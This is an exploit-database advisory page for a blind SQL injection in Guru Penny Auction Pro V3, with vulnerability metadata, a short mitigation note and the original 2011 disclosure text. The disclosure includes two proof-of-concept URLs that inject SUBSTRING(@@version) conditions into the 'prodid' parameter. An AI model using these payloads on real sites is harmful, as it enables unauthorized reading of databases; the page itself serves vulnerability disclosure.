Guru Penny Auction Pro V3 Blind SQL Injection Vulnerability

vendor:

Guru Penny Auction Pro V3

by:

v3n0m

7.5

CVSS

HIGH

Blind SQL Injection

CWE

Product Name: Guru Penny Auction Pro V3

Affected Version From: 3

Affected Version To: 3

Patch Exists: NO

Related CWE: N/A

CPE: a:guruscript:guru_penny_auction_pro_v3

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2011

Guru Penny Auction Pro V3 Blind SQL Injection Vulnerability

Guru Penny Auction Pro V3 is vulnerable to Blind SQL Injection. An attacker can exploit this vulnerability to gain access to sensitive information from the database. The vulnerable parameter is 'prodid' which can be manipulated to inject malicious SQL queries. An attacker can use the SUBSTRING() function to extract information from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

     )   )            )                     (   (         (   (    (       )     ) 
  ( /(( /( (       ( /(  (       (    (     )\ ))\ )      )\ ))\ ) )\ ) ( /(  ( /( 
  )\())\()))\ )    )\()) )\      )\   )\   (()/(()/(  (  (()/(()/((()/( )\()) )\())
 ((_)((_)\(()/(   ((_)((((_)(  (((_)(((_)(  /(_))(_)) )\  /(_))(_))/(_))(_)\|((_)\ 
__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_))  _((_)_ ((_)
\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \|   \| __| _ \ |  |_ _|| \| | |/ / 
 \ V / (_) || (_ |\ V / / _ \  | (__ / _ \ |   /| |) | _||   / |__ | | | .` | ' <  
  |_| \___/  \___| |_| /_/ \_\  \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\
										.WEB.ID
-----------------------------------------------------------------------
      Guru Penny Auction Pro V3 Blind SQL Injection Vulnerability
-----------------------------------------------------------------------
Author  	: v3n0m
Site    	: http://yogyacarderlink.web.id/
Date		: May, 28-2011
Location	: Jakarta, Indonesia
Time Zone	: GMT +7:00
----------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~

Application	: Guru Penny Auction Pro V3
Vendor  	: http://www.guruscript.com
Price		: $387 USD
Version 	: 3.0 Other versions may also be affected
Google Dork	: Use your brain & imagination :)

"NEW"GURU PENNY AUCTION PRO V3 is a powerful, scalable & 
fully-featured application that lets you create the ultimate 
profitable online penny auction website.
----------------------------------------------------------------

Blind SQLi p0c:
~~~~~~~

http://127.0.0.1/[path]/auction_details.php?prodid=72+AND+SUBSTRING(@@version,1,1)=5 << true
http://127.0.0.1/[path]/auction_details.php?prodid=72+AND+SUBSTRING(@@version,1,1)=4 << false
----------------------------------------------------------------
                   ALL YOGYACARDERLINK CREW
---------------------------[EOF]--------------------------------